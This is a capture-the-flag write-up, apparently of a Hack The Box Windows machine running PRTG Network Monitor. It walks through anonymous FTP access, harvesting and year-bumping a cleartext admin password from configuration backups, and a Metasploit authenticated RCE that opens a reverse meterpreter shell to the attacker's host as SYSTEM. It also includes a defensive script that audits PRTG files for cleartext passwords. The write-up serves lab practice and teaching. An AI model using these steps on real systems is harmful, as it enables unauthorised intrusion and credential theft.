
Enumeration

Nmap

We start by running an nmap scan of the 1000 most common ports, using -sV to perform service/version detection, -sC to run the default set of scripts, and -Pn to skip host discovery:

$ nmap -sC -sV -Pn 10.129.241.175
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-19 05:11 EDT
Nmap scan report for 10.129.241.175
Host is up (0.039s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-03-19T09:12:02
|_  start_date: 2023-03-19T09:10:57
|_clock-skew: mean: -3s, deviation: 0s, median: -3s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.36 seconds

FTP

Anonymous login

One common misconfiguration of FTP services is enabling anonymous access, which lets anyone use the service without authentication. When prompted for a username, we enter anonymous with any password and get in:

$ ftp -p 10.129.241.175
Connected to 10.129.241.175.
220 Microsoft FTP Service
Name (10.129.241.175:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49889|)
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.

User Flag

Inside Users/Public we find the user flag:

ftp> ls
229 Entering Extended Passive Mode (|||49908|)
150 Opening ASCII mode data connection.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
03-19-23  05:11AM                   34 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.
ftp> more user.txt
6d5**************************667

Port 80

We add netmon.htb to /etc/hosts:

$ echo -e "10.129.241.175\tnetmon.htb" |  sudo tee -a /etc/hosts
10.129.241.175  netmon.htb
$ whatweb http://netmon.htb              
http://netmon.htb [302 Found] Country[RESERVED][ZZ], HTTPServer[PRTG/18.1.37.13946], IP[10.129.241.175], PRTG-Network-Monitor[18.1.37.13946,PRTG], RedirectLocation[/index.htm], UncommonHeaders[x-content-type-options], X-XSS-Protection[1; mode=block]
ERROR Opening: http://netmon.htb/index.htm - incorrect header check

Visiting http://netmon.htb we find the login page of PRTG Network Monitor, an application for monitoring and managing computer networks.

Getting Access

In the PRTG Manual we find where the application stores configurations, %programdata%\Paessler\PRTG Network Monitor.

We navigate there and download the PRTG Configuration files and backups:

ftp> cd ProgramData
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50205|)
125 Data connection already open; Transfer starting.
12-15-21  10:40AM       <DIR>          Corefig
02-03-19  12:15AM       <DIR>          Licenses
11-20-16  10:36PM       <DIR>          Microsoft
02-03-19  12:18AM       <DIR>          Paessler
02-03-19  08:05AM       <DIR>          regid.1991-06.com.microsoft
07-16-16  09:18AM       <DIR>          SoftwareDistribution
02-03-19  12:15AM       <DIR>          TEMP
11-20-16  10:19PM       <DIR>          USOPrivate
11-20-16  10:19PM       <DIR>          USOShared
02-25-19  10:56PM       <DIR>          VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50215|)
125 Data connection already open; Transfer starting.
03-19-23  05:14AM       <DIR>          PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50219|)
150 Opening ASCII mode data connection.
03-19-23  05:13AM       <DIR>          Configuration Auto-Backups
03-19-23  05:11AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
03-19-23  05:11AM       <DIR>          Logs (Web Server)
03-19-23  05:12AM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
12-15-21  11:31AM              1188552 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
03-19-23  05:14AM              1636075 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get PRTG\ Configuration.dat
local: PRTG Configuration.dat remote: PRTG Configuration.dat
229 Entering Extended Passive Mode (|||50227|)
125 Data connection already open; Transfer starting.
100% |********************************************************************************|  1161 KiB    1.88 MiB/s    00:00 ETA
226 Transfer complete.
1189697 bytes received in 00:00 (1.88 MiB/s)
ftp> get PRTG\ Configuration.old
local: PRTG Configuration.old remote: PRTG Configuration.old
229 Entering Extended Passive Mode (|||50230|)
150 Opening ASCII mode data connection.
100% |********************************************************************************|  1160 KiB    1.87 MiB/s    00:00 ETA
226 Transfer complete.
1188552 bytes received in 00:00 (1.87 MiB/s)
ftp> get PRTG\ Configuration.old.bak
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
229 Entering Extended Passive Mode (|||50231|)
150 Opening ASCII mode data connection.
100% |********************************************************************************|  1126 KiB    1.90 MiB/s    00:00 ETA
226 Transfer complete.
1153755 bytes received in 00:00 (1.90 MiB/s)

We find credentials in PRTG Configuration.old.bak but they don’t work:

$ grep -B 3 -A 3 password PRTG\ Configuration.old.bak  
            <dbcredentials>
              0
            </dbcredentials>
            <dbpassword>
              <!-- User: prtgadmin -->
              PrTg@dmin2018
            </dbpassword>
            <dbtimeout>
              60
            </dbtimeout>
--
<SNIP>

Note: given the XML structure of the file, we used -B 3 to print three lines of leading context before each match and -A 3 to print three lines of trailing context after it.

Since this is an old backup, and given the administrator's habit of appending a year to the password, we can guess the current login by bumping the year, which grants us access (prtgadmin:PrTg@dmin2019).
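The grep above works, but a defender auditing their own PRTG backups wants something more systematic. The following script is an added example (not part of the original writeup): it parses the PRTG configuration XML, pulls every cleartext password element together with the username from the preceding comment, and flags values ending in a four-digit year, the rotation pattern seen above. The sample XML is constructed to mirror the snippet; the proxypassword element and its value are assumptions for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the layout seen in the grep output above
SAMPLE_CONFIG = """<prtg>
  <nodes>
    <group id="0">
      <data>
        <dbpassword>
          <!-- User: prtgadmin -->
          PrTg@dmin2018
        </dbpassword>
        <dbtimeout>
          60
        </dbtimeout>
        <proxypassword>
          S3cret!
        </proxypassword>
      </data>
    </group>
  </nodes>
</prtg>
"""

YEAR_SUFFIX = re.compile(r"(19|20)\d{2}$")  # value ends in a four-digit year


def find_cleartext_passwords(xml_text):
    """Return (tag, user, password, year_suffixed) for each *password element
    that holds a non-empty cleartext value."""
    # insert_comments=True keeps <!-- User: ... --> as child nodes (Python 3.8+)
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(xml_text, parser=parser)
    findings = []
    for el in root.iter():
        # comment nodes carry a callable tag, real elements a string tag
        if not isinstance(el.tag, str) or not el.tag.endswith("password"):
            continue
        user, parts = None, [el.text or ""]
        for child in el:
            if child.tag is ET.Comment:
                m = re.search(r"User:\s*(\S+)", child.text or "")
                user = m.group(1) if m else user
            parts.append(child.tail or "")  # the value follows the comment
        value = "".join(parts).strip()
        if value:
            findings.append((el.tag, user, value, bool(YEAR_SUFFIX.search(value))))
    return findings
```

Feed it the contents of a downloaded PRTG Configuration.old.bak and every flagged entry is a credential that sits in cleartext on a share or FTP root and, if year-suffixed, is trivially guessable from an old backup.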

Getting a Root Shell

Metasploit

Looking for known vulnerabilities we find one that may work:

$ msfconsole -q   
msf6 > search prtg

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/windows/http/prtg_authenticated_rce  2018-06-25       excellent  Yes    PRTG Network Monitor Authenticated RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/prtg_authenticated_rce

The version installed on the system is 18.1.37.13946, which is older than the release in which this RCE was fixed, so the exploit should apply.

We setup and run the exploit:

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/prtg_authenticated_rce) > show options

Module options (exploit/windows/http/prtg_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   ADMIN_PASSWORD  prtgadmin        yes       The password for the specified username
   ADMIN_USERNAME  prtgadmin        yes       The username to authenticate as
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
                                              ics/using-metasploit.html
   RPORT           80               yes       The target port (TCP)
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                            no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.122.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


View the full module info with the info, or info -d command.

msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD PrTg@dmin2019
ADMIN_PASSWORD => PrTg@dmin2019
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOSTS 10.129.241.175
RHOSTS => 10.129.241.175
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST 10.10.14.44
LHOST => 10.10.14.44
msf6 exploit(windows/http/prtg_authenticated_rce) > check
[*] 10.129.241.175:80 - The target appears to be vulnerable.
msf6 exploit(windows/http/prtg_authenticated_rce) > run

[*] Started reverse TCP handler on 10.10.14.44:4444 
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2020)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (175686 bytes) to 10.129.241.175
[*] Meterpreter session 1 opened (10.10.14.44:4444 -> 10.129.241.175:51414) at 2023-03-19 07:36:54 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We get in as NT AUTHORITY\SYSTEM.

Root Flag

We find the root flag in the Desktop directory:

meterpreter > pwd
C:\Windows\system32
meterpreter > cd C:
meterpreter > ls
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
040777/rwxrwxrwx  0       dir   2016-11-20 21:46:10 -0500  $RECYCLE.BIN
100666/rw-rw-rw-  1024    fil   2019-02-02 23:18:08 -0500  .rnd
100666/rw-rw-rw-  1       fil   2016-07-16 09:10:17 -0400  BOOTNXT
040777/rwxrwxrwx  0       dir   2019-02-03 07:05:38 -0500  Documents and Settings
040777/rwxrwxrwx  0       dir   2016-07-16 09:18:03 -0400  PerfLogs
040555/r-xr-xr-x  4096    dir   2019-02-25 21:56:41 -0500  Program Files
040777/rwxrwxrwx  4096    dir   2019-02-02 23:28:57 -0500  Program Files (x86)
040777/rwxrwxrwx  4096    dir   2021-12-15 09:40:04 -0500  ProgramData
040777/rwxrwxrwx  0       dir   2019-02-03 07:05:39 -0500  Recovery
040777/rwxrwxrwx  0       dir   2019-02-03 07:04:49 -0500  System Volume Information
040555/r-xr-xr-x  4096    dir   2019-02-03 07:08:34 -0500  Users
040777/rwxrwxrwx  16384   dir   2019-02-25 22:49:57 -0500  Windows
100444/r--r--r--  389408  fil   2016-11-20 20:59:07 -0500  bootmgr
040777/rwxrwxrwx  0       dir   2019-02-25 21:15:12 -0500  inetpub
000000/---------  0       fif   1969-12-31 19:00:00 -0500  pagefile.sys
    
meterpreter > cd Users\\Administrator\\
meterpreter > ls
Listing: C:\Users\Administrator\Desktop\\
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-02-03 07:08:39 -0500  desktop.ini
100444/r--r--r--  34    fil   2023-03-19 05:11:44 -0400  root.txt

meterpreter > cat root.txt
edd**************************be0